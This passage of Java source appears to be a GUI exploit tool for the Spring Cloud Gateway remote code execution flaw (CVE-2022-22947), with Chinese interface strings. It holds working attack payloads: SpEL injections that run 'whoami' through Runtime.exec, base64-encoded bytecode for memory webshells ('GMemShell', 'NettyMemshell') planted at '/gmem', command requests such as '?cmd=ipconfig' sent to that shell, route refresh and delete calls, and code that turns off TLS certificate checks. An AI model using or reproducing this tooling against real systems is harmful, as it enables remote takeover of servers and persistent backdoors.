lY3JldEtleVNwZWMMATsBPAwAaQE9DAE+AT8MAUABQQEAA01ENQcBQgwBOQFDDAFEAUUMAUYBRwEAFGphdmEvbWF0aC9CaWdJbnRlZ2VyDAFIATwMAGkBSQwBHQFKDAFLAR4BABBqYXZhLnV0aWwuQmFzZTY0DAFMAU0BAApnZXRFbmNvZGVyDAFOASIBAA5lbmNvZGVUb1N0cmluZwEAFnN1bi5taXNjLkJBU0U2NEVuY29kZXIMAU8BUAEABmVuY29kZQEACmdldERlY29kZXIBAAZkZWNvZGUBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyDAFRAVIBABBCb290c3RyYXBNZXRob2RzDwYBUxABVA8HAVUQAKkMAVYBVwcBWAwBWQFaAQAnb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5BwFbDAFcAV0MAGkBXgwBXwEeBwFgDAFhAVQMAJwAnQwAiQCKDABhAGIBAAdwYXlsb2FkBwFiDAFjAVQMAIEAggwBZAFlAQAKcGFyYW1ldGVycwEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtDAFmAWcMAWgBaQwBagE8DACVAJYMAWgBSgwBawFsAQARamF2YS91dGlsL0hhc2hNYXABABAzYzZlMGI4YTljMTUyMjRhAQATamF2YXgvY3J5cHRvL0NpcGhlcgEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABXBhdGhzAQAHQnVpbGRlcgEADElubmVyQ2xhc3NlcwEAYChbTGphdmEvbGFuZy9TdHJpbmc7KUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbyRCdWlsZGVyOwEASW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvJEJ1aWxkZXIBAAVidWlsZAEARSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvOwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAD3ByaW50U3RhY2tUcmFjZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQApKFtMamF2YS9uZXQvVVJMO0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEAC2dldEluc3RhbmNlAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAhnZXRCeXRlcwEABCgpW0IBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEABGluaXQBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgEAB2RvRmluYWwBAAYoW0IpW0IBABtqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3QBADEoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3Q7AQAGbGVuZ3RoAQADKClJAQAGdXBkYXRlAQAHKFtCSUkpVgEABmRpZ2VzdAEABihJW0IpVgEAFShJKUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvVXBwZXJDYXNlAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQALZ2V0Rm9ybURhdGEBAB8oKUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87CgFtAW4BACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwoAEgFvAQAFYXBwbHkBADYoTGNvbS9leGFtcGxlL0dNZW1TaGVsbDspTGphdmEvdXRpbC9mdW5jdGlvbi9GdW5jdGlvbjsBABtyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm8BAAdmbGF0TWFwAQA8KExqYXZhL3V0aWwvZnVuY3Rpb24vRnVuY3Rpb247KUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87AQAjb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXMBAAJPSwEAJUxvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czsBADooTGphdmEvbGFuZy9PYmplY3Q7TG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzOylWAQAKZ2V0TWVzc2FnZQEAJm9yZy9zcHJpbmdmcmFtZXdvcmsvdXRpbC9NdWx0aVZhbHVlTWFwAQAIZ2V0Rmlyc3QBAA1qYXZhL3V0aWwvTWFwAQADZ2V0AQADcHV0AQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAlzdWJzdHJpbmcBABYoSUkpTGphdmEvbGFuZy9TdHJpbmc7AQALdG9CeXRlQXJyYXkBAARqdXN0AQAxKExqYXZhL2xhbmcvT2JqZWN0OylMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwcBcAwBcQF0DACoAKkBACJqYXZhL2xhbmcvaW52b2tlL0xhbWJkYU1ldGFmYWN0b3J5AQALbWV0YWZhY3RvcnkHAXYBAAZMb29rdXABAMwoTGphdmEvbGFuZy9pbnZva2UvTWV0aG9kSGFuZGxlcyRMb29rdXA7TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTtMamF2YS9sYW5nL2ludm9rZS9NZXR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'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'/gmem')}\"\n" +
281 | " }\n" +
282 | " }],\n" +
283 | " \"uri\": \"http://test.com\"\n" +
284 | "}";
285 | // String json2= fd.toString();
286 |
287 | HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
288 | connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool");
289 | connection.setDoOutput(true);
290 |
291 |
292 | connection.setRequestProperty("Content-Type", "application/json");
293 | byte[] input = json2.getBytes(StandardCharsets.UTF_8);
294 | OutputStream os = connection.getOutputStream();
295 |
296 |
297 | // connection.setRequestProperty("accept", "*/*");
298 | // connection.setRequestProperty("connection", "Keep-Alive");\
299 | // connection.setRequestProperty("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
300 | // connection.setRequestProperty("Content-Type", "application/json");
301 | // BufferedReader br = new BufferedReader(new InputStreamReader(connection.getInputStream()));
302 |
303 | // connection.setDoOutput(true);
304 |
305 |
306 | // connection.disconnect();
307 |
308 | os.write(input, 0, input.length);
309 | os.flush();
310 | // String response=br.readLine();
311 | int responseCode = connection.getResponseCode();
312 |
313 | if (responseCode == 201) {
314 | send5();
315 | responsetest1.appendText("目标:" + url +"\n" + "注入成功" + "\n");
316 | responsetest1.appendText( "/gmem" + "\n");
317 |
318 | }
319 | else{
320 |
321 | responsetest1.appendText("目标:" + url + "\n" + " 注入失败" + "\n");
322 | }
323 | } catch (ProtocolException e) {
324 | throw new RuntimeException(e);
325 | } catch (MalformedURLException e) {
326 | throw new RuntimeException(e);
327 | } catch (NoSuchAlgorithmException e) {
328 | throw new RuntimeException(e);
329 | } catch (IOException e) {
330 | throw new RuntimeException(e);
331 | } catch (KeyManagementException e) {
332 | throw new RuntimeException(e);
333 | }
334 | }
335 |
336 | public void rce1(){
337 |
338 | responsetest.setText("");
339 | responsetest1.setText("");
340 |
341 |
342 | }
343 |
344 | public void daili() {
345 |
346 |
347 | // System.setProperty("java.net.useSystemProxies", "true");
348 | // System.setProperty("http.proxyHost", "127.0.0.1");
349 | // System.setProperty("http.proxyPort", "8080");
350 | Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress("127.0.0.1", 8080));
351 |
352 | }
353 |
354 |
355 | //命令执行
356 | public void send6() {
357 |
358 |
359 | Button button = new Button("Click");
360 | // TextField tf = new TextField();
361 |
362 |
363 |
364 |
365 | String url = urlTest.getText();
366 | if (url.endsWith("/")) {
367 | url = url.substring(0, url.length() - 1); // 去除最后一个字符(斜杠)
368 | }
369 | try {
370 | // TextField tf = new TextField();
371 | // if (tf.getText().equals("")) {
372 | // Alert alert = new Alert(Alert.AlertType.INFORMATION);
373 | // alert.setTitle("SORRY!");
374 | // alert.setHeaderText("");
375 | // alert.setContentText("请先检测漏洞是否存在再执行命令");
376 | // alert.showAndWait();
377 |
378 | // } else {
379 |
380 |
381 | // System.setProperty("http.proxyHost", "127.0.0.1");
382 | // System.setProperty("http.proxyPort", "8080");
383 | URL url1 = new URL(url + "/?cmd=ipconfig");
384 | // String json3="X-CMD:"+urltest4.getText();
385 | HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
386 | connection.setDoOutput(true);
387 | connection.setRequestMethod("POST");
388 | // OutputStream os = connection.getOutputStream();
389 | // byte[] input=json3.getBytes(StandardCharsets.UTF_8);
390 | connection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
391 |
392 | // connection.disconnect();
393 |
394 | // os.write(input,0,input.length);
395 | int responseCode = connection.getResponseCode();
396 |
397 | BufferedReader br = new BufferedReader(new InputStreamReader(connection.getInputStream()));
398 | StringBuffer response = new StringBuffer();
399 | String inputLine;
400 | // response.append(inputLine = br.readLine());
401 | while ((inputLine = br.readLine()) != null) {
402 | }
403 | response.append(inputLine);
404 | br.close();
405 |
406 |
407 | responsetest2.appendText(response.toString());
408 |
409 |
410 | } catch (Exception e) {
411 |
412 | // e.printStackTrace();
413 | responsetest2.appendText("命令执行失败,网络异常" + "\n");
414 | // Alert alert = new Alert(Alert.AlertType.INFORMATION);
415 | // alert.setTitle("SORRY!");
416 | // alert.setHeaderText("");
417 | // alert.setContentText("命令执行失败");
418 | // alert.showAndWait();
419 | }
420 |
421 |
422 |
423 | }
424 |
425 | public void send3() {
426 |
427 | String url = urlTest.getText();
428 | try {
429 | // System.setProperty("http.proxyHost", "127.0.0.1");
430 | // System.setProperty("http.proxyPort", "8080");
431 | URL url1 = new URL(url + "/actuator/gateway/routes/test");
432 | // URL url1 = new URL(url+"/cttl/cmd?r="+urltest1.getText());
433 | HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
434 | connection.setRequestMethod("DELETE");
435 | int responseCode = connection.getResponseCode();
436 | System.out.println("Response Code : " + responseCode);
437 | if (responseCode == 200 || responseCode == 201) {
438 | BufferedReader br = new BufferedReader(new InputStreamReader(connection.getInputStream()));
439 |
440 | StringBuffer response = new StringBuffer();
441 | response.append(br.readLine());
442 | responsetest.appendText("...." + "\n" + "...." + "\n");
443 |
444 | }
445 | } catch (Exception e) {
446 | e.printStackTrace();
447 | }
448 |
449 |
450 | }
451 |
452 | public void send2() {
453 |
454 |
455 | String url = urlTest.getText();
456 | if (url.endsWith("/")) {
457 | url = url.substring(0, url.length() - 1); // 去除最后一个字符(斜杠)
458 | }
459 |
460 | try {
461 | // System.setProperty("http.proxyHost", "127.0.0.1");
462 | // System.setProperty("http.proxyPort", "8080");
463 | URL url1 = new URL(url + "/actuator/gateway/routes/test113");
464 | // URL url1 = new URL(url + "/cttl/cmd?r=cat /etc/passwd");
465 | // URL url1 = new URL(url+"/cttl/cmd?r="+urltest1.getText());
466 | HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
467 | connection.setRequestMethod("GET");
468 |
469 | // System.out.println("Response Code : " + responseCode);
470 |
471 | BufferedReader br = new BufferedReader(new InputStreamReader(connection.getInputStream()));
472 |
473 | StringBuffer response = new StringBuffer();
474 | String inputLine;
475 | response.append(inputLine = br.readLine());
476 | while ((inputLine = br.readLine()) != null) {
477 |
478 | response.append(inputLine);
479 | responsetest.appendText(response.toString());
480 | }
481 |
482 |
483 |
484 |
485 |
486 | response.append(inputLine);
487 | String regex = "\"predicate\":\\\"([^\"]*)\\\"";
488 | Pattern pattern = Pattern.compile(regex);
489 | Matcher matcher = pattern.matcher(response);
490 | if (matcher.find()) {
491 | String value = matcher.group(1); // 提取匹配的值(这里是name的值)
492 | responsetest.appendText("返回标识:"+value+"\n");
493 | } else {
494 | // responsetest.appendText("返回标识:"+value);
495 | }
496 |
497 | // responsetest.appendText(response.toString());
498 |
499 |
500 | // JSONArray filtersArray = jsonObject.getJSONArray("filters");
501 | // for (int i = 0; i < filtersArray.toArray().length; i++) {
502 |
503 | // Object filterElement = filtersArray.get(i);
504 | // System.out.println(filterElement);;
505 |
506 |
507 |
508 |
509 | } catch (Exception e) {
510 |
511 | e.printStackTrace();
512 |
513 | }
514 | }
515 |
516 |
517 | public void send5() {
518 |
519 | String url = urlTest.getText();
520 | if (url.endsWith("/")) {
521 | url = url.substring(0, url.length() - 1); // 去除最后一个字符(斜杠)
522 | }
523 | try {
524 | // Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress("127.0.0.1", 8080));
525 | // System.setProperty("http.proxyHost", "127.0.0.1");
526 | // System.setProperty("http.proxyPort", "8080");
527 |
528 |
529 |
530 |
531 |
532 |
533 | URL url1 = new URL(url + "/actuator/gateway/refresh");
534 | // URL url1 = new URL(url+"/cttl/cmd?r="+urltest1.getText());
535 | HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
536 | connection.setRequestMethod("POST");
537 | int responseCode = connection.getResponseCode();
538 | System.out.println("Response Code : " + responseCode);
539 | if (responseCode == 200) {
540 | // responsetest.setText("重置OK!");
541 | // BufferedReader br = new BufferedReader(new InputStreamReader(connection.getInputStream()));
542 |
543 | // StringBuffer response = new StringBuffer();
544 | // }
545 |
546 | // responsetest2.appendText("注入成功/gmem");
547 |
548 | // / // responsetest.appendText("【+】可能存在Springboot Gateway漏洞" + "\n" + "RCE命令开启");
549 | // } else {
550 |
551 | // responsetest.appendText("不存在Sringboot Gateway网关命令漏洞" + "\n");
552 | }
553 |
554 |
555 | } catch (Exception e) {
556 | }
557 | }
558 |
559 | public void send1() {
560 | try {
561 |
562 | // System.setProperty("http.proxyHost", "127.0.0.1");
563 | // System.setProperty("http.proxyPort", "8080");
564 | String url = urlTest.getText();
565 | URL url1 = new URL(url + "/actuator/gateway/refresh");
566 | String json = "";
567 | HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
568 | OutputStream os = connection.getOutputStream();
569 | byte[] input = json.getBytes(StandardCharsets.UTF_8);
570 | connection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
571 | connection.setDoOutput(true);
572 | os.write(input, 0, input.length);
573 | int responseCode = connection.getResponseCode();
574 | if (responseCode == 200) {
575 |
576 | responsetest.appendText("【+】可能存在Springboot Gateway漏洞" + "\n" + "RCE命令开启" + "\n");
577 |
578 | } else {
579 |
580 | // responsetest.appendText(url1+"不存在Sringboot Gateway网关命令漏洞"+"\n"+"检测完毕"+"\n");
581 | }
582 |
583 |
584 | } catch (MalformedURLException e) {
585 | e.printStackTrace();
586 |
587 |
588 | } catch (IOException e) {
589 |
590 | }
591 |
592 | }
593 |
594 | private boolean isValidUrl(String url) {
595 | // 使用正则表达式来验证URL格式。这里只是一个简单的示例,可能需要根据实际需求进行调整。
596 | // 注意:这个正则表达式可能无法覆盖所有有效的网址格式。
597 | String urlRegex = "^(http|https)://[^\\s]*$"; // 这个正则表达式匹配以http或https开头的网址,不包括空格。
598 | return url.matches(urlRegex);
599 |
600 | }
601 |
602 |
603 |
604 | public void sendGetRequest1() {
605 |
606 |
607 | try {
608 |
609 |
610 | Button button=new Button();
611 | System.setProperty("https.proxyHost", "127.0.0.1");
612 | System.setProperty("https.proxyPort", "8080");
613 |
614 | // responsetest.appendText("开始检测Spring Cloud Gateway RCE(CVE-2022-22947)"+"\n");
615 | HostnameVerifier hv = new HostnameVerifier() {
616 | @Override
617 | public boolean verify(String urlHostName, SSLSession session) {
618 | return true;
619 | }
620 | };
621 | // 配置认证管理器
622 | TrustManager[] trustAllCerts = {new TrustAllTrustManager()};
623 | SSLContext sc = SSLContext.getInstance("SSL");
624 | SSLSessionContext sslsc = sc.getServerSessionContext();
625 | sslsc.setSessionTimeout(0);
626 | sc.init(null, trustAllCerts, null);
627 | HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
628 | // 激活主机认证
629 | HttpsURLConnection.setDefaultHostnameVerifier(hv);
630 | // Button button = new Button("Click");
631 | // fd = new TextArea();
632 |
633 |
634 | String url = urlTest.getText();
635 | if (url.endsWith("/")) {
636 | url = url.substring(0, url.length() - 1); // 去除最后一个字符(斜杠)
637 | }
638 | // if (isValidUrl(url)) {
639 |
640 | if (!isValidUrl(url)) {
641 | responsetest.appendText("输入的不是有效的网址"+"\n");
642 | // Alert alert = new Alert(Alert.AlertType.ERROR);alert.setTitle("拼写检查");alert.setHeaderText("");alert.setContentText("输入的不是有效的网址!");alert.showAndWait();
643 | } else {
644 |
645 | }
646 | URL url1 = new URL(url + "/actuator/gateway/routes/test113");
647 |
648 | String json = "{\n" +
649 | " \"id\": \"test\",\n" +
650 | " \"filters\": [{\n" +
651 | " \"name\": \"AddResponseHeader\",\n" +
652 | " \"args\": {\n" +
653 | " \"name\": \"Result\",\n" +
654 | " \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"whoami\\\"}).getInputStream()))}\"\n" +
655 | " }\n" +
656 | " }],\n" +
657 | " \"uri\": \"http://example.com\"\n" +
658 | "}";
659 | String json1 = "{\n" +
660 | " \"id\": \"test\",\n" +
661 | " \"filters\": [{\n" +
662 | " \"name\": \"AddResponseHeader\",\n" +
663 | " \"args\": {\"name\": \"Result\",\"value\": \"#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQBFAoAPgB9CAB+BwB/CABTBwCACgAFAIEKAIIAgwcAhAoAggCFCgCGAIcKAIYAiAoACACJCgAFAIoIAIsKAIwAjQgASwoABQCOCgCPAIMKAI8AkAoABQCRCABOCACSBwCTCgAXAH0KAI8AlAgAlQcAlggAlwsAmACZCACaCACbCwCcAJ0HAJ4LACEAnwgAoAoAoQCiCgChAKMHAKQKAKUApgoApQCnCgCoAKkKACYAqggAqwoAJgCsCgAmAK0JAK4ArwoAFwCwCgAbALELALIAswcAtAkAtQC2CQC3ALgKALkAugoAMgC7CwC8AJ8JAL0AvggAvwoAoQDACwCyAMEJAMIAwwsAxADFBwDGBwDHAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA9MTmV0dHlNZW1zaGVsbDsBAAhkb0luamVjdAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAVX3ZhbCRkaXNwb3NhYmxlU2VydmVyAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAFHZhbCRkaXNwb3NhYmxlU2VydmVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAHX2NvbmZpZwEABmNvbmZpZwEAEF9kb09uQ2hhbm5lbEluaXQBAAZ0aHJlYWQBAAFpAQABSQEACmdldFRocmVhZHMBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAB3RocmVhZHMBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADbXNnAQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAyAcAyQcAhAcAlgEADW9uQ2hhbm5lbEluaXQBAFcoTHJlYWN0b3IvbmV0dHkvQ29ubmVjdGlvbk9ic2VydmVyO0xpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7TGphdmEvbmV0L1NvY2tldEFkZHJlc3M7KVYBABJjb25uZWN0aW9uT2JzZXJ2ZXIBACJMcmVhY3Rvci9uZXR0eS9Db25uZWN0aW9uT2JzZXJ2ZXI7AQAHY2hhbm5lbAEAGkxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7AQANc29ja2V0QWRkcmVzcwEAGExqYXZhL25ldC9Tb2NrZXRBZGRyZXNzOwEACHBpcGVsaW5lAQAiTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAEE1ldGhvZFBhcmFtZXRlcnMBAAtjaGFubmVsUmVhZAEAPShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9PYmplY3Q7KVYBAANjbWQBAApleGVjUmVzdWx0AQALaHR0cFJlcXVlc3QBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXF1ZXN0OwEAA2N0eAEAKExpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyQ29udGV4dDsHAJ4BAApFeGNlcHRpb25zAQAEc2VuZAEAbShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9TdHJpbmc7TGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7KVYBAAdjb250ZXh0AQAGc3RhdHVzAQAwTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7AQAIcmVzcG9uc2UBAC5MaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0Z1bGxIdHRwUmVzcG9uc2U7AQAKU291cmNlRmlsZQEAEk5ldHR5TWVtc2hlbGwuamF2YQwAQABBAQAMaW5qZWN0LXN0YXJ0AQAQamF2YS9sYW5nL1RocmVhZAEAD2phdmEvbG